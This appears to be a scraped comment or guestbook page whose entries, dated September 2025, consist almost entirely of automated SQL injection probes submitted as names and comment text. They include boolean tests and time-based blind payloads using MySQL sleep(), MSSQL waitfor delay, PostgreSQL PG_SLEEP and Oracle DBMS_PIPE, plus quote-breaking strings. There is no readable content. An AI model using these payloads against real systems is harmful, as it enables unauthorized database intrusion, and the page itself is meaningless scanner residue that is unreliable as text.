pHqghUme����%2527%2522\'\" Sept. 22, 2025, 11:48 a.m.
555
@@BSKRa Sept. 22, 2025, 11:48 a.m.
555
pHqghUme Sept. 24, 2025, 7:57 p.m.
PzQTITfO
pHqghUme Sept. 24, 2025, 7:57 p.m.
*1
pHqghUme Sept. 24, 2025, 7:57 p.m.
*1
pHqghUme Sept. 24, 2025, 7:57 p.m.
*1
pHqghUme Sept. 24, 2025, 7:57 p.m.
*1
pHqghUme Sept. 24, 2025, 7:57 p.m.
-1 OR 2+347-347-1=0+0+0+1
pHqghUme Sept. 24, 2025, 7:57 p.m.
-1 OR 3+347-347-1=0+0+0+1
pHqghUme Sept. 24, 2025, 7:57 p.m.
*if(now()=sysdate(),sleep(15),0)
pHqghUme Sept. 24, 2025, 7:58 p.m.
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme Sept. 24, 2025, 7:58 p.m.
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme Sept. 24, 2025, 7:58 p.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme Sept. 24, 2025, 7:58 p.m.
-1; waitfor delay '0:0:15' --
pHqghUme Sept. 24, 2025, 7:58 p.m.
-1); waitfor delay '0:0:15' --
pHqghUme Sept. 24, 2025, 7:58 p.m.
-1 waitfor delay '0:0:15' --
pHqghUme Sept. 24, 2025, 7:58 p.m.
vojXrjwD'; waitfor delay '0:0:15' --
pHqghUme Sept. 24, 2025, 7:58 p.m.
-1 OR 42=(SELECT 42 FROM PG_SLEEP(15))--
pHqghUme Sept. 24, 2025, 7:58 p.m.
-1) OR 439=(SELECT 439 FROM PG_SLEEP(15))--
pHqghUme Sept. 24, 2025, 7:58 p.m.
-1)) OR 341=(SELECT 341 FROM PG_SLEEP(15))--
pHqghUme Sept. 24, 2025, 7:58 p.m.
2rsJo48t' OR 839=(SELECT 839 FROM PG_SLEEP(15))--
pHqghUme Sept. 24, 2025, 7:58 p.m.
fIVRiRxi') OR 122=(SELECT 122 FROM PG_SLEEP(15))--
pHqghUme Sept. 24, 2025, 7:58 p.m.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Sept. 24, 2025, 7:58 p.m.
'"
pHqghUme Sept. 24, 2025, 7:58 p.m.
����%2527%2522\'\"
pHqghUme Sept. 24, 2025, 7:58 p.m.
@@NDvcw
pHqghUme Sept. 24, 2025, 7:59 p.m.
1
pHqghUme Sept. 24, 2025, 7:59 p.m.
1
pHqghUme Sept. 24, 2025, 8 p.m.
1
pHqghUme Sept. 24, 2025, 8 p.m.
1
pHqghUme Sept. 24, 2025, 8 p.m.
555
pHqghUme Sept. 24, 2025, 8 p.m.
1
pHqghUme Sept. 24, 2025, 8 p.m.
555
pHqghUme Sept. 24, 2025, 8 p.m.
555
pHqghUme Sept. 24, 2025, 8 p.m.
555
pHqghUme Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
1
pHqghUme4Ftlpqz6 Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
1
-1 OR 2+72-72-1=0+0+0+1 -- Sept. 24, 2025, 8:01 p.m.
1
-1 OR 2+200-200-1=0+0+0+1 Sept. 24, 2025, 8:01 p.m.
1
-1' OR 2+492-492-1=0+0+0+1 -- Sept. 24, 2025, 8:01 p.m.
1
-1' OR 2+359-359-1=0+0+0+1 or '3jHDNOBi'=' Sept. 24, 2025, 8:01 p.m.
1
-1" OR 2+722-722-1=0+0+0+1 -- Sept. 24, 2025, 8:01 p.m.
1
if(now()=sysdate(),sleep(15),0) Sept. 24, 2025, 8:01 p.m.
1
pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Sept. 24, 2025, 8:01 p.m.
1
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
555
pHqghUme-1 waitfor delay '0:0:15' -- Sept. 24, 2025, 8:01 p.m.
1
pHqghUmepuwLtNES'; waitfor delay '0:0:15' -- Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
555
pHqghUme3sC37PIF' OR 504=(SELECT 504 FROM PG_SLEEP(15))-- Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
555
pHqghUmeyBn9lduE') OR 366=(SELECT 366 FROM PG_SLEEP(15))-- Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
555
pHqghUme6AV3iTqM')) OR 971=(SELECT 971 FROM PG_SLEEP(15))-- Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
555
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
1
pHqghUme'" Sept. 24, 2025, 8:01 p.m.
1
pHqghUme����%2527%2522\'\" Sept. 24, 2025, 8:01 p.m.
1
@@76ZLG Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
555
pHqghUme Sept. 24, 2025, 8:01 p.m.
555
pHqghUme Sept. 24, 2025, 8:01 p.m.
555
pHqghUmeoILnnQxF Sept. 24, 2025, 8:01 p.m.
555
pHqghUme Sept. 24, 2025, 8:01 p.m.
555
-1 OR 2+731-731-1=0+0+0+1 -- Sept. 24, 2025, 8:01 p.m.
555
-1 OR 2+157-157-1=0+0+0+1 Sept. 24, 2025, 8:01 p.m.
555
-1' OR 2+281-281-1=0+0+0+1 -- Sept. 24, 2025, 8:01 p.m.
555
-1' OR 2+733-733-1=0+0+0+1 or 'ry0Xg9aL'=' Sept. 24, 2025, 8:01 p.m.
555
-1" OR 2+60-60-1=0+0+0+1 -- Sept. 24, 2025, 8:01 p.m.
555
pHqghUme Sept. 24, 2025, 8:01 p.m.
1
if(now()=sysdate(),sleep(15),0) Sept. 24, 2025, 8:01 p.m.
555
pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Sept. 24, 2025, 8:01 p.m.
555
pHqghUme Sept. 24, 2025, 8:01 p.m.
1
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Sept. 24, 2025, 8:01 p.m.
555
pHqghUme Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
15gwNyBiR
pHqghUme-1 waitfor delay '0:0:15' -- Sept. 24, 2025, 8:01 p.m.
555
pHqghUme Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
-1 OR 2+378-378-1=0+0+0+1 --
pHqghUme Sept. 24, 2025, 8:01 p.m.
-1 OR 2+659-659-1=0+0+0+1
pHqghUme Sept. 24, 2025, 8:01 p.m.
-1' OR 2+325-325-1=0+0+0+1 --
pHqghUme Sept. 24, 2025, 8:01 p.m.
-1' OR 2+780-780-1=0+0+0+1 or 'zCesWnzb'='
pHqghUme Sept. 24, 2025, 8:01 p.m.
-1" OR 2+339-339-1=0+0+0+1 --
pHqghUmeXGtdXne3'; waitfor delay '0:0:15' -- Sept. 24, 2025, 8:01 p.m.
555
pHqghUme Sept. 24, 2025, 8:01 p.m.
1*if(now()=sysdate(),sleep(15),0)
pHqghUmevyrPBQgD' OR 256=(SELECT 256 FROM PG_SLEEP(15))-- Sept. 24, 2025, 8:01 p.m.
555
pHqghUme Sept. 24, 2025, 8:01 p.m.
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUmeQqq7zJtL') OR 995=(SELECT 995 FROM PG_SLEEP(15))-- Sept. 24, 2025, 8:01 p.m.
555
pHqghUme Sept. 24, 2025, 8:01 p.m.
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUmewnI6qggr')) OR 634=(SELECT 634 FROM PG_SLEEP(15))-- Sept. 24, 2025, 8:01 p.m.
555
pHqghUme Sept. 24, 2025, 8:01 p.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Sept. 24, 2025, 8:01 p.m.
555
pHqghUme Sept. 24, 2025, 8:01 p.m.
555
pHqghUme'" Sept. 24, 2025, 8:01 p.m.
555
pHqghUme����%2527%2522\'\" Sept. 24, 2025, 8:01 p.m.
555
@@SUu77 Sept. 24, 2025, 8:01 p.m.
555
pHqghUme Sept. 24, 2025, 8:01 p.m.
1-1; waitfor delay '0:0:15' --
pHqghUme Sept. 24, 2025, 8:01 p.m.
1-1); waitfor delay '0:0:15' --
pHqghUme Sept. 24, 2025, 8:01 p.m.
1-1 waitfor delay '0:0:15' --
pHqghUme Sept. 24, 2025, 8:01 p.m.
1CqId7609'; waitfor delay '0:0:15' --
pHqghUme Sept. 24, 2025, 8:01 p.m.
1-1 OR 919=(SELECT 919 FROM PG_SLEEP(15))--
pHqghUme Sept. 24, 2025, 8:01 p.m.
1-1) OR 99=(SELECT 99 FROM PG_SLEEP(15))--
pHqghUme Sept. 24, 2025, 8:01 p.m.
1-1)) OR 88=(SELECT 88 FROM PG_SLEEP(15))--
pHqghUme Sept. 24, 2025, 8:01 p.m.
1z4jx0OwC' OR 979=(SELECT 979 FROM PG_SLEEP(15))--
pHqghUme Sept. 24, 2025, 8:01 p.m.
1a8mPMy9Z') OR 852=(SELECT 852 FROM PG_SLEEP(15))--
pHqghUme Sept. 24, 2025, 8:01 p.m.
1fqjtw3Fg')) OR 561=(SELECT 561 FROM PG_SLEEP(15))--
pHqghUme Sept. 24, 2025, 8:01 p.m.
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme Sept. 24, 2025, 8:01 p.m.
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Sept. 24, 2025, 8:01 p.m.
1
pHqghUme Sept. 24, 2025, 8:01 p.m.
1'"
pHqghUme Sept. 24, 2025, 8:01 p.m.
1����%2527%2522\'\"
pHqghUme Sept. 24, 2025, 8:01 p.m.
@@6a1EU
pHqghUme Sept. 25, 2025, 12:51 a.m.
1
pHqghUme Sept. 25, 2025, 12:51 a.m.
1
pHqghUme Sept. 25, 2025, 12:53 a.m.
555
pHqghUme Sept. 25, 2025, 12:53 a.m.
1
pHqghUme Sept. 25, 2025, 12:53 a.m.
1
pHqghUme Sept. 25, 2025, 12:53 a.m.
1
pHqghUme Sept. 25, 2025, 12:53 a.m.
555
pHqghUme Sept. 25, 2025, 12:53 a.m.
555
pHqghUme Sept. 25, 2025, 12:54 a.m.
5550dzpwNtZ
pHqghUme Sept. 25, 2025, 12:54 a.m.
555
pHqghUme Sept. 25, 2025, 12:54 a.m.
-1 OR 2+920-920-1=0+0+0+1 --
pHqghUme Sept. 25, 2025, 12:54 a.m.
-1 OR 2+766-766-1=0+0+0+1
pHqghUme Sept. 25, 2025, 12:54 a.m.
-1' OR 2+158-158-1=0+0+0+1 --
pHqghUme Sept. 25, 2025, 12:54 a.m.
-1' OR 2+798-798-1=0+0+0+1 or 'ME0mVsKi'='
pHqghUme Sept. 25, 2025, 12:54 a.m.
-1" OR 2+747-747-1=0+0+0+1 --
pHqghUme Sept. 25, 2025, 12:54 a.m.
555*if(now()=sysdate(),sleep(15),0)
pHqghUme Sept. 25, 2025, 12:54 a.m.
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme Sept. 25, 2025, 12:54 a.m.
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme Sept. 25, 2025, 12:54 a.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme Sept. 25, 2025, 12:54 a.m.
555-1; waitfor delay '0:0:15' --
pHqghUme Sept. 25, 2025, 12:54 a.m.
555-1); waitfor delay '0:0:15' --
pHqghUme Sept. 25, 2025, 12:54 a.m.
555-1 waitfor delay '0:0:15' --
pHqghUme Sept. 25, 2025, 12:54 a.m.
1
pHqghUme Sept. 25, 2025, 12:54 a.m.
5554EYgxQ5D'; waitfor delay '0:0:15' --
pHqghUme Sept. 25, 2025, 12:54 a.m.
1
pHqghUme Sept. 25, 2025, 12:54 a.m.
555-1 OR 619=(SELECT 619 FROM PG_SLEEP(15))--
pHqghUme Sept. 25, 2025, 12:54 a.m.
1
pHqghUme Sept. 25, 2025, 12:54 a.m.
555-1) OR 678=(SELECT 678 FROM PG_SLEEP(15))--
pHqghUmeCk7GfPoI Sept. 25, 2025, 12:54 a.m.
1
pHqghUme Sept. 25, 2025, 12:54 a.m.
555-1)) OR 356=(SELECT 356 FROM PG_SLEEP(15))--
pHqghUme Sept. 25, 2025, 12:54 a.m.
1
-1 OR 2+600-600-1=0+0+0+1 -- Sept. 25, 2025, 12:54 a.m.
1
-1 OR 2+968-968-1=0+0+0+1 Sept. 25, 2025, 12:54 a.m.
1
-1' OR 2+371-371-1=0+0+0+1 -- Sept. 25, 2025, 12:54 a.m.
1
-1' OR 2+633-633-1=0+0+0+1 or '97uzHRWz'=' Sept. 25, 2025, 12:54 a.m.
1
-1" OR 2+198-198-1=0+0+0+1 -- Sept. 25, 2025, 12:54 a.m.
1
pHqghUme Sept. 25, 2025, 12:55 a.m.
555sRuG8SVm' OR 738=(SELECT 738 FROM PG_SLEEP(15))--
if(now()=sysdate(),sleep(15),0) Sept. 25, 2025, 12:55 a.m.
1
pHqghUme Sept. 25, 2025, 12:55 a.m.
555zcdVc8Mp') OR 955=(SELECT 955 FROM PG_SLEEP(15))--
pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Sept. 25, 2025, 12:55 a.m.
1
pHqghUme Sept. 25, 2025, 12:55 a.m.
555TOWkPEBv')) OR 648=(SELECT 648 FROM PG_SLEEP(15))--
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Sept. 25, 2025, 12:55 a.m.
1
pHqghUme Sept. 25, 2025, 12:55 a.m.
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme Sept. 25, 2025, 12:55 a.m.
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Sept. 25, 2025, 12:55 a.m.
555
pHqghUme Sept. 25, 2025, 12:55 a.m.
555'"
pHqghUme Sept. 25, 2025, 12:55 a.m.
555����%2527%2522\'\"
pHqghUme Sept. 25, 2025, 12:55 a.m.
@@WyWti
pHqghUme-1 waitfor delay '0:0:15' -- Sept. 25, 2025, 12:55 a.m.
1
pHqghUme Sept. 25, 2025, 12:55 a.m.
555
pHqghUmeu7qwsCHb'; waitfor delay '0:0:15' -- Sept. 25, 2025, 12:55 a.m.
1
pHqghUme Sept. 25, 2025, 12:55 a.m.
555
pHqghUme12ibi8e7' OR 782=(SELECT 782 FROM PG_SLEEP(15))-- Sept. 25, 2025, 12:55 a.m.
1
pHqghUmewuwtz2tq') OR 79=(SELECT 79 FROM PG_SLEEP(15))-- Sept. 25, 2025, 12:55 a.m.
1
pHqghUme Sept. 25, 2025, 12:55 a.m.
555
pHqghUmeNRzWKVJZ')) OR 939=(SELECT 939 FROM PG_SLEEP(15))-- Sept. 25, 2025, 12:55 a.m.
1
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Sept. 25, 2025, 12:55 a.m.
1
pHqghUme Sept. 25, 2025, 12:55 a.m.
1
pHqghUme'" Sept. 25, 2025, 12:55 a.m.
1
pHqghUme����%2527%2522\'\" Sept. 25, 2025, 12:55 a.m.
1
@@VOwMQ Sept. 25, 2025, 12:55 a.m.
1
pHqghUme Sept. 25, 2025, 12:55 a.m.
1
pHqghUme Sept. 25, 2025, 12:55 a.m.
1
pHqghUme Sept. 25, 2025, 12:55 a.m.
1
pHqghUme Sept. 25, 2025, 12:56 a.m.
1
pHqghUme Sept. 25, 2025, 12:56 a.m.
555
pHqghUme Sept. 25, 2025, 12:56 a.m.
555
pHqghUme Sept. 25, 2025, 12:56 a.m.
555
pHqghUme Sept. 25, 2025, 12:56 a.m.
555
pHqghUme Sept. 25, 2025, 12:56 a.m.
555
pHqghUme Sept. 25, 2025, 12:56 a.m.
1
pHqghUme Sept. 25, 2025, 12:56 a.m.
1
pHqghUme Sept. 25, 2025, 12:56 a.m.
1
pHqghUme Sept. 25, 2025, 12:56 a.m.
1zHh88uCT
pHqghUme Sept. 25, 2025, 12:56 a.m.
1
pHqghUme Sept. 25, 2025, 12:56 a.m.
-1 OR 2+805-805-1=0+0+0+1 --
pHqghUme Sept. 25, 2025, 12:56 a.m.
-1 OR 2+757-757-1=0+0+0+1
pHqghUme Sept. 25, 2025, 12:56 a.m.
-1' OR 2+414-414-1=0+0+0+1 --
pHqghUme Sept. 25, 2025, 12:56 a.m.
-1' OR 2+270-270-1=0+0+0+1 or 'hjzmY9Sy'='
pHqghUme Sept. 25, 2025, 12:56 a.m.
-1" OR 2+923-923-1=0+0+0+1 --
pHqghUme Sept. 25, 2025, 12:57 a.m.
1*if(now()=sysdate(),sleep(15),0)
pHqghUme Sept. 25, 2025, 12:57 a.m.
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme Sept. 25, 2025, 12:57 a.m.
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme Sept. 25, 2025, 12:57 a.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme Sept. 25, 2025, 12:57 a.m.
1-1; waitfor delay '0:0:15' --
pHqghUme Sept. 25, 2025, 12:57 a.m.
555
pHqghUme Sept. 25, 2025, 12:57 a.m.
1-1); waitfor delay '0:0:15' --
pHqghUme Sept. 25, 2025, 12:57 a.m.
555
pHqghUme Sept. 25, 2025, 12:57 a.m.
1-1 waitfor delay '0:0:15' --
pHqghUme Sept. 25, 2025, 12:57 a.m.
555
pHqghUme Sept. 25, 2025, 12:57 a.m.
1UqmiyDPX'; waitfor delay '0:0:15' --
pHqghUmeKTziX03v Sept. 25, 2025, 12:57 a.m.
555
pHqghUme Sept. 25, 2025, 12:57 a.m.
1-1 OR 326=(SELECT 326 FROM PG_SLEEP(15))--
pHqghUme Sept. 25, 2025, 12:57 a.m.
555
-1 OR 2+229-229-1=0+0+0+1 -- Sept. 25, 2025, 12:57 a.m.
555
-1 OR 2+352-352-1=0+0+0+1 Sept. 25, 2025, 12:57 a.m.
555
pHqghUme Sept. 25, 2025, 12:57 a.m.
1-1) OR 780=(SELECT 780 FROM PG_SLEEP(15))--
-1' OR 2+222-222-1=0+0+0+1 -- Sept. 25, 2025, 12:57 a.m.
555
-1' OR 2+967-967-1=0+0+0+1 or 'wBHrniTJ'=' Sept. 25, 2025, 12:57 a.m.
555
-1" OR 2+972-972-1=0+0+0+1 -- Sept. 25, 2025, 12:57 a.m.
555
pHqghUme Sept. 25, 2025, 12:57 a.m.
1-1)) OR 301=(SELECT 301 FROM PG_SLEEP(15))--
if(now()=sysdate(),sleep(15),0) Sept. 25, 2025, 12:57 a.m.
555
pHqghUme Sept. 25, 2025, 12:57 a.m.
1qUhVeQtm' OR 47=(SELECT 47 FROM PG_SLEEP(15))--
pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Sept. 25, 2025, 12:57 a.m.
555
pHqghUme Sept. 25, 2025, 12:57 a.m.
1QisD9MWQ') OR 239=(SELECT 239 FROM PG_SLEEP(15))--
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Sept. 25, 2025, 12:57 a.m.
555
pHqghUme Sept. 25, 2025, 12:57 a.m.
1urknPRAj')) OR 713=(SELECT 713 FROM PG_SLEEP(15))--
pHqghUme Sept. 25, 2025, 12:57 a.m.
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme-1 waitfor delay '0:0:15' -- Sept. 25, 2025, 12:57 a.m.
555
pHqghUme Sept. 25, 2025, 12:57 a.m.
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Sept. 25, 2025, 12:57 a.m.
1
pHqghUme Sept. 25, 2025, 12:57 a.m.
1'"
pHqghUme Sept. 25, 2025, 12:57 a.m.
1����%2527%2522\'\"
pHqghUmeIZKT6yPi'; waitfor delay '0:0:15' -- Sept. 25, 2025, 12:57 a.m.
555
pHqghUme Sept. 25, 2025, 12:57 a.m.
@@3o9QC
pHqghUmeDtlpfpX9' OR 307=(SELECT 307 FROM PG_SLEEP(15))-- Sept. 25, 2025, 12:57 a.m.
555
pHqghUmeZmoNDxLX') OR 126=(SELECT 126 FROM PG_SLEEP(15))-- Sept. 25, 2025, 12:57 a.m.
555
pHqghUmeoVNvtmL8')) OR 981=(SELECT 981 FROM PG_SLEEP(15))-- Sept. 25, 2025, 12:58 a.m.
555
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Sept. 25, 2025, 12:58 a.m.
555
pHqghUme Sept. 25, 2025, 12:58 a.m.
555
pHqghUme'" Sept. 25, 2025, 12:58 a.m.
555
pHqghUme����%2527%2522\'\" Sept. 25, 2025, 12:58 a.m.
555
@@aEOrY Sept. 25, 2025, 12:58 a.m.
555
pHqghUme Sept. 27, 2025, 12:13 p.m.
FoVBlqj8
pHqghUme Sept. 27, 2025, 12:13 p.m.
*1
pHqghUme Sept. 27, 2025, 12:13 p.m.
*1
pHqghUme Sept. 27, 2025, 12:13 p.m.
*1
pHqghUme Sept. 27, 2025, 12:13 p.m.
*1
pHqghUme Sept. 27, 2025, 12:13 p.m.
-1 OR 2+224-224-1=0+0+0+1
pHqghUme Sept. 27, 2025, 12:13 p.m.
-1 OR 3+224-224-1=0+0+0+1
pHqghUme Sept. 27, 2025, 12:13 p.m.
*if(now()=sysdate(),sleep(15),0)
pHqghUme Sept. 27, 2025, 12:13 p.m.
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme Sept. 27, 2025, 12:13 p.m.
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme Sept. 27, 2025, 12:13 p.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme Sept. 27, 2025, 12:13 p.m.
-1; waitfor delay '0:0:15' --
pHqghUme Sept. 27, 2025, 12:13 p.m.
1
pHqghUme Sept. 27, 2025, 12:13 p.m.
-1); waitfor delay '0:0:15' --
pHqghUme Sept. 27, 2025, 12:13 p.m.
1
pHqghUme Sept. 27, 2025, 12:13 p.m.
-1 waitfor delay '0:0:15' --
pHqghUme Sept. 27, 2025, 12:14 p.m.
0CZwFdxr'; waitfor delay '0:0:15' --
pHqghUme Sept. 27, 2025, 12:14 p.m.
-1 OR 220=(SELECT 220 FROM PG_SLEEP(15))--
pHqghUme Sept. 27, 2025, 12:14 p.m.
-1) OR 253=(SELECT 253 FROM PG_SLEEP(15))--
pHqghUme Sept. 27, 2025, 12:14 p.m.
-1)) OR 255=(SELECT 255 FROM PG_SLEEP(15))--
pHqghUme Sept. 27, 2025, 12:14 p.m.
oLSF6KDt' OR 844=(SELECT 844 FROM PG_SLEEP(15))--
pHqghUme Sept. 27, 2025, 12:14 p.m.
8Y8QJ889') OR 366=(SELECT 366 FROM PG_SLEEP(15))--
pHqghUme Sept. 27, 2025, 12:14 p.m.
4YXBkYe6')) OR 850=(SELECT 850 FROM PG_SLEEP(15))--
pHqghUme Sept. 27, 2025, 12:14 p.m.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme Sept. 27, 2025, 12:14 p.m.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Sept. 27, 2025, 12:14 p.m.
'"
pHqghUme Sept. 27, 2025, 12:14 p.m.
����%2527%2522\'\"
pHqghUme Sept. 27, 2025, 12:14 p.m.
@@Qbued
pHqghUme Sept. 27, 2025, 12:14 p.m.
1
pHqghUme Sept. 27, 2025, 12:14 p.m.
1
pHqghUme Sept. 27, 2025, 12:15 p.m.
1
pHqghUme Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
1
pHqghUme Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
1
pHqghUme Sept. 27, 2025, 12:15 p.m.
1
pHqghUme Sept. 27, 2025, 12:15 p.m.
555
pHqghUmeYGMVIS7w Sept. 27, 2025, 12:15 p.m.
1
pHqghUme Sept. 27, 2025, 12:15 p.m.
1
-1 OR 2+230-230-1=0+0+0+1 -- Sept. 27, 2025, 12:15 p.m.
1
-1 OR 2+424-424-1=0+0+0+1 Sept. 27, 2025, 12:15 p.m.
1
-1' OR 2+32-32-1=0+0+0+1 -- Sept. 27, 2025, 12:15 p.m.
1
-1' OR 2+129-129-1=0+0+0+1 or 'xvt0l06A'=' Sept. 27, 2025, 12:15 p.m.
1
-1" OR 2+417-417-1=0+0+0+1 -- Sept. 27, 2025, 12:15 p.m.
1
if(now()=sysdate(),sleep(15),0) Sept. 27, 2025, 12:15 p.m.
1
pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Sept. 27, 2025, 12:15 p.m.
1
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Sept. 27, 2025, 12:15 p.m.
1
pHqghUme-1 waitfor delay '0:0:15' -- Sept. 27, 2025, 12:15 p.m.
1
pHqghUmezDu2qTjQ'; waitfor delay '0:0:15' -- Sept. 27, 2025, 12:15 p.m.
1
pHqghUmeVYLlfisC' OR 770=(SELECT 770 FROM PG_SLEEP(15))-- Sept. 27, 2025, 12:15 p.m.
1
pHqghUme0eBOGqUo') OR 692=(SELECT 692 FROM PG_SLEEP(15))-- Sept. 27, 2025, 12:15 p.m.
1
pHqghUme Sept. 27, 2025, 12:15 p.m.
555
pHqghUme5raScPKK')) OR 351=(SELECT 351 FROM PG_SLEEP(15))-- Sept. 27, 2025, 12:15 p.m.
1
pHqghUme Sept. 27, 2025, 12:15 p.m.
555
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Sept. 27, 2025, 12:15 p.m.
1
pHqghUme Sept. 27, 2025, 12:15 p.m.
1
pHqghUme'" Sept. 27, 2025, 12:15 p.m.
1
pHqghUme����%2527%2522\'\" Sept. 27, 2025, 12:15 p.m.
1
@@dZMFU Sept. 27, 2025, 12:15 p.m.
1
pHqghUme Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
1
pHqghUme Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
1
pHqghUme Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
1
pHqghUme Sept. 27, 2025, 12:15 p.m.
1
pHqghUme Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
1
pHqghUme Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
1
pHqghUmeODsjrIXh Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
1
pHqghUme Sept. 27, 2025, 12:15 p.m.
555
-1 OR 2+998-998-1=0+0+0+1 -- Sept. 27, 2025, 12:15 p.m.
555
-1 OR 2+86-86-1=0+0+0+1 Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
19FpgOZ12
-1' OR 2+590-590-1=0+0+0+1 -- Sept. 27, 2025, 12:15 p.m.
555
-1' OR 2+631-631-1=0+0+0+1 or 'JM97SHqx'=' Sept. 27, 2025, 12:15 p.m.
555
-1" OR 2+755-755-1=0+0+0+1 -- Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
1
if(now()=sysdate(),sleep(15),0) Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
-1 OR 2+253-253-1=0+0+0+1 --
pHqghUme Sept. 27, 2025, 12:15 p.m.
-1 OR 2+93-93-1=0+0+0+1
pHqghUme Sept. 27, 2025, 12:15 p.m.
-1' OR 2+87-87-1=0+0+0+1 --
pHqghUme Sept. 27, 2025, 12:15 p.m.
-1' OR 2+533-533-1=0+0+0+1 or 'UtO7Q8ow'='
pHqghUme Sept. 27, 2025, 12:15 p.m.
-1" OR 2+893-893-1=0+0+0+1 --
